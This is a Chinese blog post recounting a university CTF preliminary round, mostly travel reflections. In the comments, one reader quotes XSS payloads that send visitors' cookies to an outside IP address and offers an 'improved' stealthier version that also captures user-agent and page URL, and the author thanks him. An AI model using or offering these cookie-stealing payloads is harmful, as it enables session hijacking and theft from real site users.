杭电第四届网络攻防大赛(蛋疼的初赛)

最近比赛比较多的，在老战友kun和小强的邀请下，参加了这个比赛，主要是也想去杭州游玩一番，顺便省下交通费用，之前不曾去过杭州，听说西湖很大，隔岸不见牛马

之前与旧友交谈，推荐了几家菜馆，不过兴致不大。记得去天津时，初夏的夜晚海河边蛙噪虫鸣，隔三差五的便有带着大沿帽子的人在钓鱼，鱼篓里收获或多或少，手提的灯发出淡黄色的光，这就吧河堤上的我隔开成了两个境界，所以决心这次如果到杭州边一定要找个阳光好的日子去西湖边钓鱼，还要在苏堤架上火锅，边吃边钓，何等的逍遥快活。

这次初赛题出的有些意思，不过难度还好，分数机制也很巧妙，总之是不错的比赛，因为平常没有涉及破解方面的知识，所以记录下几道渗透方面的题，

鸟叔这道题其实是考察一个脚本的编写，分别是post和get两种提交的方法，脚本语言的编写效率果然很高

A very nice challenge with several steps, thank you to the author! 

比赛结束，在和另外一队狼狈为奸的情况下，得到第十的成绩，不知道该失落还是高兴，总之静待决赛吧。

2楼qiushi888前天 13:44

都挺基础的，不过那个正则匹配加了e参数，难道不是入口嘛？为什么要纠结于注入呢？

1楼qiushi888前天 11:41

<img src="'http://112.67.131.63/cookie/cookie.php?cookie=escape(document.cookies)" width=0 height=0 border=0 /> n<script>document.location='http://112.67.131.63/cookie/cookie.php?cookie=escape(document.cookie);</script> n<SCRIPT SRC=http://112.67.131.63/cookie/cookie.js></SCRIPT> n第一种escape(document.cookies)这个根本不会当js执行，n第二种，按你意思是要跳转，不过应该是location.href="",直接跳转傻逼都知道网站被入侵了n第三种不知道js里你要写什么，给你一个标准写法n<script>new Image.src="http://xxxx"+encodeURIComponent(document.cookie);</script>最好把user-agent也跟上，还有当前页面的url

Re: wangyi_lin前天 11:47

回复qiushi888n多谢指点啊，已经修改了